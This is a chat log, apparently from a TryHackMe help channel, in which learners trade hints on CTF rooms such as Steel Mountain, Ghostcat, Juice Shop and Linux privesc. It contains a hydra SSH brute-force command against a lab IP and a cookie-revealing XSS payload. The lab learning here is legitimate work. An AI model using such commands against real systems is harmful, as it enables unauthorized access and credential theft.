Task 6, #1: Each time I try that the application crashes. I read the hint and used that symbol but no matter what I put after the pipe the application crashes.

Task 7, #2: When I try to use a directory traversal on the page mentioned in the hint the application crashes as well. I used the traversal as a parameter for the picture id thingy.

Task 7, #4: How do I approach that? I tried the obvious like using words like "free" but without success.

On Steel Mountain question 2; name of file server..anyone help with me with correct format/syntax, I found the HttpFileServer 2.3 . ive tried everything i can think of..

@muted ferry no, just type 'options'

and read them

I stil don't see them

no not the global options

exploit's options

how?

what is the command

I've been looking for such a long time

https://www.offensive-security.com/metasploit-unleashed/ @muted ferry

@white salmon It is the "RP: Metasploit" one

Thanks 🙂

any hint?

@lament ibex there's a hint on there 👀

yea but still no idea what it is

Trying every possible password until you find the right one, not breaking the cryptography through cryptanalysis

yea idk

Look at different types of attacks on cryptography

Ninja's hint is really good

they are always good.

A third predominant address type is typically reserved for the router, what is the name of this address type. A hint for this? Also is this case sensitive?

@rotund kraken You'll want a capital letter at the start

Hi

some suggestions for finding the flag of the "Learn Linux" room ?

Go over everything you already have

Hi all, Linux Privesc room here. Trying to exploit $PATH.

I don't understand what the last * ** should be

@white salmon do you mean the last one?

Hi all, Linux Privesc room here. Trying to exploit $PATH.
Anyone?

@inland onyx ok i think i need a hint for the privesc (room = willow)

didnt find anything useful with suid, sudo apparently hsa NOPASSWD for mount but thats not actually working, cronjobs not vulnerable from what i can see, and didnt really find anything else

zeitgeist db was empty too aparently

Hey ! Anyone has done the CC: Pentesting Room ? It's asking the flag for ping scanning with nmap and apparently it's not -sP so I'm wondering if i got it wrong or if there's a problem with the room

@white salmon The answer for that is in the task description

In the paragraph

It's a fill in the blanks really

@woven cosmos you don’t have to use -sP for that

Ok thanks !

just perform a usual scan and find what you need

got the smbshare password for milesdyson on terminator, but having issues logging in with smbclient?

hmm, in the room basic pentesting when attacking ssh for the password i am pretty sure i got the right command (tried username in upper and lowercase too) but its not finding anything

||hydra -I -t 4 -l Jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.27.35||

the task says brute force but for an actual brute force attack instead of dictionary the complexity is too high, its 7 chars

@tranquil nymph Dictionary is a type of brute force

i suppose thats true

but then i dont see the problem with my command, its been running for a while now

ugh.. it took 20 minutes to brute force

not cool

Uh, what the heck are your specs?

It shouldn't take nearly that long for that room

its hydra vs ssh, idk

Oh, hang on, you thread limited it didn't you

it did about 40 per minute

with 4 threads

pretty shit

Y'know, you can go over that even for SSH

16 is iffy

ohh

But it works

well, the more you know

You can do a ridiculous number of threads with Hydra -- I know a guy during cyber advent bruteforced the web password for Hydra day in a few hours with something like 2500 threads

thats.. quite the solid computer then

maybe he hijacked uni servers for this

Doesn't really matter power wise for hydra

oh?

The threads matters more serverside

Parallel login requests, or not overloading the server with password hashing

Mhm. Depends on how many simultaneous tasks the server can handle

HackerNote can't handle that many as it's Bcrypt behind the scenes

You basically DoS the server as it's running on a tiny AWS VM

Asking again, couldn't figure it out last time. On rpmetasploit: how do I get the spool service in "we're in, now what?"

@white salmon spoolsvc.exe

You need the PID for it

ah, thank you!

whats up

can anyone give me some hint for the shostcat

ghostcat*

it's new

and only 1 person got 1 question yet

@ruby junco do we need to bruteforce in this room?

Probably not a good room to start on if you're new to cybersec

defo no

also, i don't think i got the access to the room how it was supposed to

i know im trying the only port works for me 8080 and 8009 is not working

im beginner tho

yeah, ghostcat is not that easy

i know im struggling with it

@past night DM me your route and I'll tell you if it's correct

@ripe needle It's not a beginner friendly challenge

@ruby junco do we need to bruteforce in this room?
@past night It is necessary for the files that you will find inside a user folder.

yup

that's what i was wondering

just what i was looking too

thank you i was thinking it its easy but i think is not for me

i did a lot of searching in google but nothing

@ripe needle DM

kindly help over this Who is the employee of the month?
room: steel mountain

hey, so i'm doing the OWASP Juice Shop room, and I got up to task 5 'Broken Authentication', where I have to find Jim's secret question

The hint says ||try look for more information on Jim||. Does that mean OSINT?

Like should my approach be to find an online presence or something?

What's up

im having some trouble running a binary anyone around to help out?

@white salmon which one

the Imgur link in "ccstego" task 7.2 does not work? or is it just me?

Hey @jaunty relic I've completed the room (and will send proof) but can't quite remember the link you're talking about. Mind shooting me over a DM and I'll try to replicate please?

Discussed with user, ran through the task again and URL works 🙂 fyi

👍

Need some suggest for dictionary list in bruteforce Jack machine 😦

bruteforce all day but nothing happened lol

hi all 🙂 , working on tomghost room - need some help to root .

Hello guys, I need a little hint in the pentestquestionaire, I answered all the questions except (Flag used to load a list of hosts.)

man nmap

that is more that enough, I feel stupid 😆 thank @stuck fractal

thanks*

is there a writeup for avengers?

!writeup avengers

Sorry, there is no writeup for this room.

nope ;/

:/ did you do this room?

no i have not

what do you need help with?

yes

task 3 #1

give me 1 second, I'll check it out

ok thx

i dont see flag2

what kind of browser are you using?

firefox

So, when you open the Network tab you'll have to refresh the page, ex. F5, then your browser will make bunch of GET requests to the server, you'll have to find the very first GET request, it looks like this

then click it and on the right side look for the Response Headers

ah thx i looked under the wrong tab

no problem, glad to help

Could someone help me with the cross site scripting room task 3 question 3? i’m not sure what the answer should be, i’ve created an alert box but im not sure what the answer im looking for is

look at #5 on Task 3, the <script> there could be similar to the question 3
not really sure tho, but worth trying

I understand the script stuff i just dont know what i am supposed to put in the answer fields

the cookie that appears on the popup

Ok then i dont understand the script stuff theres no cookie in the popup

let me fire up my vm and ill look at it

Ok thanks

heey everyone! Anyone can give me a hint on the last task in Learn Linux room https://tryhackme.com/room/zthlinux ?

@white salmon 43 ?

ok give me 1 sec

i know u need root privilege to access /root directory. i just dn't know how to get root passwd

@remote monolith
||<script>alert(document.cookie)</script>||
it first would show your stored cookie and then it will show the flag2
tell me if it that works

@white salmon sorry I was helping him
i'm about to show you how to do it

its oki tyt

ok so,
do you have all the credentials for all the shiba users?

@white salmon

yeah

the only users i don't have creds for is noot, nootnoot and root

ok good,
try to look for a files that belong to each user

do you want me to give you the command for that?
if you don't know how to look for files that belong to 'X' user?

You mean the find command or just the files inside the home dir of each user ?

to achieve this, you'll need to use the ||find|| command to look for files that belong to each user

yeah oki i will try that, Thanks @boreal whale

keep in mind, you'll have to use the ||find|| command to look through the entire system, ||/|| would do that

I just need a tiny hint ! I tried my regex online and it gives me the good things but I can't see anyfile in /home/ whatsoever